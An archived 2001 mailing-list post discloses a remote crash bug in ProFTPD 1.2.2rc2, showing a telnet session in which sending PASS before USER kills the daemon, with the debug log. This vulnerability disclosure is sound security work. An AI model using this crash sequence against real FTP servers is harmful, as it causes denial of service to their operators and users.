ProFTPD 1.2.2rc2 DoS

From: Daniel (danielat_private)
Date: Sun Jun 03 2001 - 15:53:34 PDT

Next message: Daniel Roesen: "Re: ProFTPD 1.2.2rc2 DoS"

Previous message: Gossi The Dog: "Mail bug"
Next in thread: Daniel Roesen: "Re: ProFTPD 1.2.2rc2 DoS"
Reply: Daniel Roesen: "Re: ProFTPD 1.2.2rc2 DoS"
Reply: Kurth Bemis: "Re: ProFTPD 1.2.2rc2 DoS"
Reply: ma: "Odp: ProFTPD 1.2.2rc2 DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I've discovered that ProFTPD 1.2.2rc2 has a bug - each instance of the
daemon can be crashed remotely:
This happens when the PASS command is received before the USER command:
box:~# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.2.2rc2 Server (ProFTPD Default Installation) [box.xxx.com]
pass
Connection closed by foreign host.
box:~#
If you run proftpd -d 5, (debug mode, level 5) in the logs you see:
box.xxx.com (localhost[127.0.0.1]) - FTP session opened.
box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden)
box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)

 - Daniel Volozov

Next message: Daniel Roesen: "Re: ProFTPD 1.2.2rc2 DoS"
Previous message: Gossi The Dog: "Mail bug"
Next in thread: Daniel Roesen: "Re: ProFTPD 1.2.2rc2 DoS"
Reply: Daniel Roesen: "Re: ProFTPD 1.2.2rc2 DoS"
Reply: Kurth Bemis: "Re: ProFTPD 1.2.2rc2 DoS"
Reply: ma: "Odp: ProFTPD 1.2.2rc2 DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jun 03 2001 - 16:41:17 PDT